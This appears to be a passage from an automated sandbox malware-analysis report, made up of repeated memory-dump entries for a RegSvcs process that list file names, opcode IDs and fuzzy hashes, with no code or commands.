                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                              • Instruction ID: 1aaad8a58f5e8de36bc0e621882e7d9c386a6a4adfdba8b8c254a93f90a79af5
                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                              • Instruction Fuzzy Hash: 67014C33A001418BDF558E5ADC80FA2776EBFC4710F1544A5EE41CF296EA71CC81E390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9856be460b98d6679beb2ba7cd457a6470b471dbd0f9af7f545664f8026cd3ef
                                                                                              • Instruction ID: 43163bfb6bcbefe46995a7f34e8ff64f96e6e9f13dccf31f257d518aea7f0b08
                                                                                              • Opcode Fuzzy Hash: 9856be460b98d6679beb2ba7cd457a6470b471dbd0f9af7f545664f8026cd3ef
                                                                                              • Instruction Fuzzy Hash: 6811177290001DABCB15DB94CC80DEFBBBCEF48254F044166E906E7211EA35AA15CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0b896dbbdb1e43d8de955df1c6a8d578b8c6dcbc511ec641e31c10e88dd2d77
                                                                                              • Instruction ID: 0761d101bad4bf84fe0be0c4498167ebbe3e2275d0d1fdff4552a8a234bc1b1c
                                                                                              • Opcode Fuzzy Hash: c0b896dbbdb1e43d8de955df1c6a8d578b8c6dcbc511ec641e31c10e88dd2d77
                                                                                              • Instruction Fuzzy Hash: 4011C832A445459FD711CF58D800BA5BBF5FF5A314F088199E985CB315D732EC81DBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40bc92a8021a527de5a5665d1aaaea4a725fb8bd365b32de0c0a90c34f6e4b75
                                                                                              • Instruction ID: 017fa1895eb9649f942514bab356564a602494401f2248710f1ca87eacdba502
                                                                                              • Opcode Fuzzy Hash: 40bc92a8021a527de5a5665d1aaaea4a725fb8bd365b32de0c0a90c34f6e4b75
                                                                                              • Instruction Fuzzy Hash: 6A11ECB1E0021D9FCB14DF99D541AAEBBF8FF58350F10806AF945E7351D674EA018BA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b1ce04420505df1c978903e57787ab6aa6d480a6a7cbf0c69d84475c8e176078
                                                                                              • Instruction ID: c82ce8cdd8fe4aadebc14f541b3f93ea525305ee1dea289b28ad3f467a4f20d4
                                                                                              • Opcode Fuzzy Hash: b1ce04420505df1c978903e57787ab6aa6d480a6a7cbf0c69d84475c8e176078
                                                                                              • Instruction Fuzzy Hash: 1001F1311482109BCB72BB18C80093AFBE9FF41B50B0944AAF6C41B622CB24EC41DB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                              • Instruction ID: 38436471dc789d04714da30ae0b48ef4bb846d459628f242a122845dcf2fda9a
                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                              • Instruction Fuzzy Hash: 2801B53210070ADFDB2396A9C844FA777EEFFC4350F55441AA586CB680DA74E502D7A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db2f63d0fd2956e393e2e5fba8d2891b928eae43092e4f0364ca34f7ba441766
                                                                                              • Instruction ID: 2644bb9f9c9ab0dbe6a04deb62ccf5428a0ca734664c942df97f27a8855a06a9
                                                                                              • Opcode Fuzzy Hash: db2f63d0fd2956e393e2e5fba8d2891b928eae43092e4f0364ca34f7ba441766
                                                                                              • Instruction Fuzzy Hash: 65116D75A0125DEFDB05EFA4C851EAE7BB5EB54340F104099F9419B250DA35AE11CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a401580bea9d1226e238b84142acc0cc20971300663d6488228931eb8011d74a
                                                                                              • Instruction ID: b688606815c4519b21d5288d6ea576b7fb750e97d800941434da132772c7671f
                                                                                              • Opcode Fuzzy Hash: a401580bea9d1226e238b84142acc0cc20971300663d6488228931eb8011d74a
                                                                                              • Instruction Fuzzy Hash: 5601DB71201609BFD751BB79CD41E67B7ECFF44794B050665B60493572DB68EC01C6E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e698d974116a94b441044e36702834dd589bd4564fc8b41faec1375675fc4780
                                                                                              • Instruction ID: 962bd16ac3073a4bc40df75e66ae858d4736741ae1d7bec2dbb508db62bd1ded
                                                                                              • Opcode Fuzzy Hash: e698d974116a94b441044e36702834dd589bd4564fc8b41faec1375675fc4780
                                                                                              • Instruction Fuzzy Hash: EE014C32614615AFD324EF6DC848DABBBE8FF88720F114169F99987180E7319901CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 11855f0d118a32767bc401d67545cf14cf03c6ac81bae008987d24c26a6d72e8
                                                                                              • Instruction ID: 7a32477b3ea708e67e342dd81d5b83ecb4bf8618144626b6feea6a7c6c8fc7a3
                                                                                              • Opcode Fuzzy Hash: 11855f0d118a32767bc401d67545cf14cf03c6ac81bae008987d24c26a6d72e8
                                                                                              • Instruction Fuzzy Hash: DC115B71A0120DABDB15EF68C944EAE7BB9EF48350F004099FD8197350DA35EE11DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a80d0206cd2e37c3c3a91da06e77523c20978eaec333293efaf50746300d978c
                                                                                              • Instruction ID: 7e1434f57b77a7b29e73cb1ce97546c37e74ae6e2c63ddb1509db583083c7085
                                                                                              • Opcode Fuzzy Hash: a80d0206cd2e37c3c3a91da06e77523c20978eaec333293efaf50746300d978c
                                                                                              • Instruction Fuzzy Hash: 80115BB16193089FC700DF69D54699BBBE8EF9D710F00855EFA98D7391E634E900CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44532c7d418b3773e545cf407896dec07bb82c2ffb4bec4d6f1aef1f65f42152
                                                                                              • Instruction ID: 175bffbe7fc2c8766ea90ad146d7ee849f26c89d75d3cffbef20bc2de667a7fd
                                                                                              • Opcode Fuzzy Hash: 44532c7d418b3773e545cf407896dec07bb82c2ffb4bec4d6f1aef1f65f42152
                                                                                              • Instruction Fuzzy Hash: 111179B16083089FC300DF69C54199FBBE8EF99350F00855EF998D73A0E634E900CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                              • Instruction ID: 955592462c3b2038bcf9051027d9cf98f1b1c787b8c5d9ad028d14e9ed795854
                                                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                              • Instruction Fuzzy Hash: 9A01D8322006059FD7219A59D884FD6B7EAFFC5310F044459E683CB651DAB0F940C754
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                              • Instruction ID: 601daac003cc87dbecbf3614a7ba869cee59f14e09da4ec162e23af42c08f7ee
                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                              • Instruction Fuzzy Hash: B0018BB22006889FD322871DC948F3A7BEDEF85754F0944A1FA45CB6B2DBB8DC40D625
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 28242d91e7039e02c554087bac1f3a93dcb3a7a625af12970b35bfcb7f9a29d9
                                                                                              • Instruction ID: 5547137b1a72f25c8e171e2f717ea0135a8136305ef7c82db7b545ef4b01af3e
                                                                                              • Opcode Fuzzy Hash: 28242d91e7039e02c554087bac1f3a93dcb3a7a625af12970b35bfcb7f9a29d9
                                                                                              • Instruction Fuzzy Hash: 3201F772B00605DBC714EB69DD01AAE77BEFF80360F19802AD942D7344EE30DD02D691
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: cdf7c8f2e80cf02010e73acc9facd749b98fae116f0440f66c1ff13a53ca0653
                                                                                              • Instruction ID: be47523ff7f4bd079da90cde39a6caa75da7d1dfefbb9b5a7b941c32bb5e0868
                                                                                              • Opcode Fuzzy Hash: cdf7c8f2e80cf02010e73acc9facd749b98fae116f0440f66c1ff13a53ca0653
                                                                                              • Instruction Fuzzy Hash: FE01F2B1244B00AFD3316B19D801F1BBAA8EF44B50F11042AF7CA8F3A0C6B598408B54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 82420004ac682059f53ab145607c65328a65bd85c2dfe3615e412f5ca44d9619
                                                                                              • Instruction ID: 4f0a85801e28b88c50b68ee2143195713306e5ebd1d3dfb40b44457bc896e626
                                                                                              • Opcode Fuzzy Hash: 82420004ac682059f53ab145607c65328a65bd85c2dfe3615e412f5ca44d9619
                                                                                              • Instruction Fuzzy Hash: 5EF0F433A41B64B7C7319B5B8D45F17BAAEEF84BA0F154028B60597650DA34ED01EAA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                              • Instruction ID: 8c7b6589bbae6f3707644e522feb23ba59154c412da9bb9064c47949202d7208
                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                              • Instruction Fuzzy Hash: 2CF0C8B2600615ABE325CF4DDD41E57FBEADFC1A80F048268F655C7220E631DD04CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                              • Instruction ID: abcbb4f83cc7df941ac2299f0406dbedf734303ffbea61d493b611e815ec873d
                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                              • Instruction Fuzzy Hash: 1CF0F673658A239BC73316598C40B6BB69B8FC1B64F2E4037F209DB344CA648C02F6D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction ID: 7be6bc654c873bf6575738dfe566db1870539426e130eeeabe4ba9a8901f1f90
                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction Fuzzy Hash: 9A0181322406899BE363965EC905B5ABFD8EF41758F0980A6FE848B6A2DA79C900C651
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 03c480bca9c794ad1cf46968a3796549179f25923f9a64b9994f29d8855f476a
                                                                                              • Instruction ID: c157a0e39f34c0bbd980c227bafeea42ca1b8edccc726de2e9c3c8b46a039df0
                                                                                              • Opcode Fuzzy Hash: 03c480bca9c794ad1cf46968a3796549179f25923f9a64b9994f29d8855f476a
                                                                                              • Instruction Fuzzy Hash: FD017171A0025D9FDB00DFA9D441AEEBBF4AF48310F144059F540A7380D778EA01CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                              • Instruction ID: 94745306c6d0e23b9ff8d6d0fee768791414ac32f31910d2280dddf1a4209952
                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                              • Instruction Fuzzy Hash: 4FF0127210001DBFEF019F94DD80DFF7B7EEF55298B114125FA1192160D636DE21A7A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 273088b38f024f80d982d361cab796d782026ef5344cb233d1ad4aa21921aef2
                                                                                              • Instruction ID: 3434f0978060c83e1489670f6104f3a22b9ddfe7299c900764d8dafc97cfe621
                                                                                              • Opcode Fuzzy Hash: 273088b38f024f80d982d361cab796d782026ef5344cb233d1ad4aa21921aef2
                                                                                              • Instruction Fuzzy Hash: 00018936211119EBCF129E84DC40EDE7FAAFB4C654F058101FE5866220C736D970EB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af6e711cfcbac5c3350f8b853ac4ad259d3c43f92f74463b5bf2042eacaa18cf
                                                                                              • Instruction ID: 062f2cf3c71332e747abb5a42e0e4725d2ed76bd23c529e24f1d6fcafe000dab
                                                                                              • Opcode Fuzzy Hash: af6e711cfcbac5c3350f8b853ac4ad259d3c43f92f74463b5bf2042eacaa18cf
                                                                                              • Instruction Fuzzy Hash: 21F0BB727043525BE764A6169C02B62329BD7D0761F2D8077E6058B7D3F971DC01E7E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0173266682f720eb6fe2289f9197da0647ae87335453550d61d5e81b1efaa5e6
                                                                                              • Instruction ID: cf20c3df54c5bb89cebd8db0a7189d19004781fcbba233690e1b059facc593ba
                                                                                              • Opcode Fuzzy Hash: 0173266682f720eb6fe2289f9197da0647ae87335453550d61d5e81b1efaa5e6
                                                                                              • Instruction Fuzzy Hash: C80144702416859BE3B29B6CCD49B6A37E8AB40B44F4845D0FE81CB6EFE7ADD541C610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                              • Instruction ID: 5b4fba5e67d5a8ce9ba1714baed82fc845c39aee6c5bde7bcd8c005bc4131c8f
                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                              • Instruction Fuzzy Hash: 03F02E35349D1357FBB6BA2E9860B3EBAD5AF90E10B05856C96D1DB680DF20DC00C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                              • Instruction ID: b68e2089ae9734e7395c6789e011d7057f7e49e312b34a170f3a06c4a63196c5
                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                              • Instruction Fuzzy Hash: A3F05E367117129FE721DA4DDC80F16B7ECAFD5A60F6A00B5A648AB260C760EC0187E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 47a824c956df5c5b0b3cdd40930deb549f155071b3a494780b674e31558fed92
                                                                                              • Instruction ID: e161c8c32958b7d498956a23739a29c9cc66b329817681d7f3b8b6893bd6b06f
                                                                                              • Opcode Fuzzy Hash: 47a824c956df5c5b0b3cdd40930deb549f155071b3a494780b674e31558fed92
                                                                                              • Instruction Fuzzy Hash: 4CF0A4706053089FD310EF28C541A1EB7E4EF98710F40465AB8D4DB390EA38E900C756
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                              • Instruction ID: db7c291f941365076f4e213d35a1d0ff58d3c2a937af8a0664bb9ea27d8a3434
                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                              • Instruction Fuzzy Hash: 04F02472604204EFE314DF21CC01F56B6E9EF9C340F148079AAC4C7268FAB4DE41D654
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 557352408a02c098ae52724374595c19866f5f7d31c8238f5f66f8b43ba75d49
                                                                                              • Instruction ID: 406f644c9a3729bb9b6e8de61dcbf530397a71c3c56ffaf79cf92430b08f29df
                                                                                              • Opcode Fuzzy Hash: 557352408a02c098ae52724374595c19866f5f7d31c8238f5f66f8b43ba75d49
                                                                                              • Instruction Fuzzy Hash: 4DF0E9325003846BD7317A1CEC44B6ABBADFBF5714F49445AFDC52715186396C84C7A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3a77944328fcbe39f87686777274dc571cf2d6268a85c3556a56226816b1406c
                                                                                              • Instruction ID: 9bd231ef74498e4c7301a63b8cb549da0c780c0f12058c42d9db2a5ba37fbf30
                                                                                              • Opcode Fuzzy Hash: 3a77944328fcbe39f87686777274dc571cf2d6268a85c3556a56226816b1406c
                                                                                              • Instruction Fuzzy Hash: 6CF04F70A0124D9FDB04EF69C555AAEB7B4EF18300F508059B995EB395DA78EA01CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23eecb338af7ad3ca7529d4dc055900b339d41c3c64e22d7b1a920a8d20f5644
                                                                                              • Instruction ID: 74433202fd2bd715773237b8ca54501540aaf0d29a11ea6d64ed74af21df049b
                                                                                              • Opcode Fuzzy Hash: 23eecb338af7ad3ca7529d4dc055900b339d41c3c64e22d7b1a920a8d20f5644
                                                                                              • Instruction Fuzzy Hash: 97F02E32C062E08FD732CB6AC054BA1B7C4AB10730F1C896ED49983102C328FE80E600
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 554bbe1bf313beb3fe5b396a656a22195d4c88a6cba4bda0205a292838900629
                                                                                              • Instruction ID: e9ff6ddf65d4e65be534afe71c62d28fe945232f8919ac65c7ec9d90f544ffdd
                                                                                              • Opcode Fuzzy Hash: 554bbe1bf313beb3fe5b396a656a22195d4c88a6cba4bda0205a292838900629
                                                                                              • Instruction Fuzzy Hash: 2DF027768176C906CF726B6CA8B02D1AF98A745114F4910C9D8E057209C57BA483C724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cfcbbfbb6ad43dae9f0787322ce03d234f194efb5931cbf7aec1b45ff1f83424
